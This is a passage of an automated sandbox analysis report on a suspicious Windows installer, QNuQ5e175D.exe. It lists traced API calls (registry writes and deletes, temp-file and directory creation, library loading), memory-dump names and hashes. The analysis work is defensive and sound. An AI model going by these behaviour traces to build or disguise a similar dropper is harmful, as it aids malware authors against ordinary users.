                                                          • GlobalFree.KERNEL32(00000000), ref: 6FC418C5
                                                          • FreeLibrary.KERNEL32(?), ref: 6FC4194B
                                                          • GlobalFree.KERNEL32(00000000), ref: 6FC41970
                                                            • Part of subcall function 6FC4243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6FC4246F
                                                            • Part of subcall function 6FC42810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6FC41896,00000000), ref: 6FC428E0
                                                            • Part of subcall function 6FC41666: wsprintfW.USER32 ref: 6FC41694
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1977389511.000000006FC41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FC40000, based on PE: true
                                                          • Associated: 00000000.00000002.1977358248.000000006FC40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1977514250.000000006FC44000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1977627868.000000006FC46000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6fc40000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc$Librarywsprintf
                                                          • String ID:
                                                          • API String ID: 3962662361-3916222277
                                                          • Opcode ID: 689d51eade2dcf513090996544a4414b9a032dfb822fd69a1a01b8520a79a23e
                                                          • Instruction ID: 734fd7d05987b2df0b1b2fdebfc58133fec4009e84d2201e886d24fe1716b9d5
                                                          • Opcode Fuzzy Hash: 689d51eade2dcf513090996544a4414b9a032dfb822fd69a1a01b8520a79a23e
                                                          • Instruction Fuzzy Hash: 004180719003459BDB129F7CD884BD537A8BF05368F044566EE99DA0C6FB74E1ACCB60
                                                          Function 004024AF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1066 4024af-4024e0 call 402dcb * 2 call 402e5b 1073 4024e6-4024f0 1066->1073 1074 402c4f-402c5e 1066->1074 1075 4024f2-4024ff call 402dcb lstrlenW 1073->1075 1076 402503-402506 1073->1076 1075->1076 1079 402508-402519 call 402da9 1076->1079 1080 40251a-40251d 1076->1080 1079->1080 1084 40252e-402542 RegSetValueExW 1080->1084 1085 40251f-402529 call 4032d9 1080->1085 1088 402544 1084->1088 1089 402547-402628 RegCloseKey 1084->1089 1085->1084 1088->1089 1089->1074
                                                          APIs
                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,00000023,00000011,00000002), ref: 004024FA
                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,00000000,00000011,00000002), ref: 0040253A
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,00000000,00000011,00000002), ref: 00402622
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CloseValuelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp
                                                          • API String ID: 2655323295-469814226
                                                          • Opcode ID: 2d5a3a6cbba744cb4f49549abd2315f3a0bbe869b0ca912842418fb0edf1760d
                                                          • Instruction ID: 9ef1a868ac7dccf2a0d827ba333ec8444b87bd6dca13d8647f6a5f0896484b93
                                                          • Opcode Fuzzy Hash: 2d5a3a6cbba744cb4f49549abd2315f3a0bbe869b0ca912842418fb0edf1760d
                                                          • Instruction Fuzzy Hash: DF11B131D00119BEEF00AFA1DE4AAAEB6B4EF44318F20443FF404B61D1D7B88E009A68
                                                          Function 00406096 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004060B4
                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403550,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C), ref: 004060CF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-678247507
                                                          • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                          • Instruction ID: 0f0e971a11aa9000600537ad3b21051f2e76e4828209a3ca974843c19b3e0847
                                                          • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                          • Instruction Fuzzy Hash: B5F09076B40204BBEB00CF69ED05F9EB7ACEBA5750F11803AE901F7180E6B099648768
                                                          Function 004015E6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00405EF1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,?,00405F65,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405EFF
                                                            • Part of subcall function 00405EF1: CharNextW.USER32(00000000), ref: 00405F04
                                                            • Part of subcall function 00405EF1: CharNextW.USER32(00000000), ref: 00405F1C
                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                                            • Part of subcall function 00405ACB: CreateDirectoryW.KERNELBASE(00437800,?), ref: 00405B0D
                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres,?,00000000,000000F0), ref: 00401672
                                                          Strings
                                                          • C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres, xrefs: 00401665
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                          • String ID: C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres
                                                          • API String ID: 1892508949-2593783087
                                                          • Opcode ID: 522b783c9de46c7eb01671ee67dcdc22f4b8e2acc15c0cd2b2b5e6563b12514b
                                                          • Instruction ID: 104414052cab316a424bfe0d2ff1de268c148956b102069c6a2fab9df067ebf3
                                                          • Opcode Fuzzy Hash: 522b783c9de46c7eb01671ee67dcdc22f4b8e2acc15c0cd2b2b5e6563b12514b
                                                          • Instruction Fuzzy Hash: 0911BE31804514ABCF206FA5CD01AAE36B0EF14368B25493BE941B22F1C63A4A41DA5D
                                                          Function 00406445 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,Call,?,00000000,004066B6,80000002), ref: 0040648B
                                                          • RegCloseKey.KERNELBASE(?), ref: 00406496
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID: Call
                                                          • API String ID: 3356406503-1824292864
                                                          • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                          • Instruction ID: 39ab2095516423f533248995afa5b88f9e2e33bd0920f2eea258779ff0fd120f
                                                          • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                          • Instruction Fuzzy Hash: AB017C72500209AADF21CF51CC09EDB3BACFB55364F01803AFD1AA21A0D778D964DBA8
                                                          Function 004020FD Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402128
                                                            • Part of subcall function 004055FC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,00000000,00425A20,74DF23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000,?), ref: 00405634
                                                            • Part of subcall function 004055FC: lstrlenW.KERNEL32(0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,00000000,00425A20,74DF23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000), ref: 00405644
                                                            • Part of subcall function 004055FC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,0040343D,0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,00000000,00425A20,74DF23A0), ref: 00405657
                                                            • Part of subcall function 004055FC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll), ref: 00405669
                                                            • Part of subcall function 004055FC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040568F
                                                            • Part of subcall function 004055FC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004056A9
                                                            • Part of subcall function 004055FC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004056B7
                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402139
                                                          • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004021B6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 334405425-0
                                                          • Opcode ID: 67a013c8050cadbf48abc2068aad44e6bd126c58b8073b2edd87dd65272e994b
                                                          • Instruction ID: ae41dde4eff0046a081fa93f434b6203791b13f397c20c3345ef6f3f33f6a532
                                                          • Opcode Fuzzy Hash: 67a013c8050cadbf48abc2068aad44e6bd126c58b8073b2edd87dd65272e994b
                                                          • Instruction Fuzzy Hash: 4B21A131904104EACF10AFA5CF89A9E7A71BF44369F30413BF105B91E5CBBD99829A2D
                                                          Function 00401BC0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalFree.KERNEL32(00000000), ref: 00401C30
                                                          • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C42
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree
                                                          • String ID: Call
                                                          • API String ID: 3394109436-1824292864
                                                          • Opcode ID: b2bf5aa3fb98d5d7659b4efbfb09c2738223d3c1d5b8947c58a47baf3ffb3ed2
                                                          • Instruction ID: b741a03fd702b7c6772e3f95c256d95ec8b7de3af2fdc922703a565136a7d287
                                                          • Opcode Fuzzy Hash: b2bf5aa3fb98d5d7659b4efbfb09c2738223d3c1d5b8947c58a47baf3ffb3ed2
                                                          • Instruction Fuzzy Hash: 9521F372904150EBDB20ABA4EE85E6E33B8AB04718715063FF542B72D5C7BCE8409B9D
                                                          Function 00402324 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004068D4: FindFirstFileW.KERNELBASE(74DF3420,0042FAB8,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,00405F97,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068DF
                                                            • Part of subcall function 004068D4: FindClose.KERNELBASE(00000000), ref: 004068EB
                                                          • lstrlenW.KERNEL32 ref: 00402364
                                                          • lstrlenW.KERNEL32(00000000), ref: 0040236F
                                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402398
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: FileFindlstrlen$CloseFirstOperation
                                                          • String ID:
                                                          • API String ID: 1486964399-0
                                                          • Opcode ID: 8ce371ef362fb3a0bf5470d2f9de7d7a8b9c8f0d3a32a51a843dbca6af91aa01
                                                          • Instruction ID: efc15b5f6e7b569f76b1b900a6dd714e3f258eaed93f5a56bcbfb146dffa85c7
                                                          • Opcode Fuzzy Hash: 8ce371ef362fb3a0bf5470d2f9de7d7a8b9c8f0d3a32a51a843dbca6af91aa01
                                                          • Instruction Fuzzy Hash: 94118671914318AADB00EFF58D0AA9EB7F8AF04314F10443FA405F71D5D7B8C9418B69
                                                          Function 004025C3 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025F6
                                                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402609
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,00000000,00000011,00000002), ref: 00402622
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Enum$CloseValue
                                                          • String ID:
                                                          • API String ID: 397863658-0
                                                          • Opcode ID: b3e66f98151b13811c6deab5670c9eebffc93282c8efb5a28582c7ee2f6ef350
                                                          • Instruction ID: 66810f11062e6ea255b80fddf1e3d4c9698f673e023b75e7ff91682f7f8ae36f
                                                          • Opcode Fuzzy Hash: b3e66f98151b13811c6deab5670c9eebffc93282c8efb5a28582c7ee2f6ef350
                                                          • Instruction Fuzzy Hash: 43017C71A04615ABEB149F94DE58AAFB668EF80348F10443EF101B61D0D7B85E41976D
                                                          Function 0040254F Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402580
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,00000000,00000011,00000002), ref: 00402622
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID:
                                                          • API String ID: 3356406503-0
                                                          • Opcode ID: 49ca1381ded4af27f8ac224b17b3ae694fb74f22b67379b644ce572c4f680cb7
                                                          • Instruction ID: 5bae25e85081f80c41e61f77185b89043c8d74e7c66b6edfbb666f5a0c3c1719
                                                          • Opcode Fuzzy Hash: 49ca1381ded4af27f8ac224b17b3ae694fb74f22b67379b644ce572c4f680cb7
                                                          • Instruction Fuzzy Hash: 45118C71904216EADF15DFA0CA599AEB7B4FF04348F20443FE402B62D0D3B84A45DB9E
                                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                          • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                                          • Instruction ID: 0adee223d2b7ba7d815a442a2885e1f2b60e3b86eb1a18037e9b6c54a102055c
                                                          • Opcode Fuzzy Hash: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                                          • Instruction Fuzzy Hash: 0E01FF31620220AFE7195B389E05B6B3698E710329F10863FF851F62F1EA78DC429B4C
                                                          Function 00402459 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040247B
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00402484
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
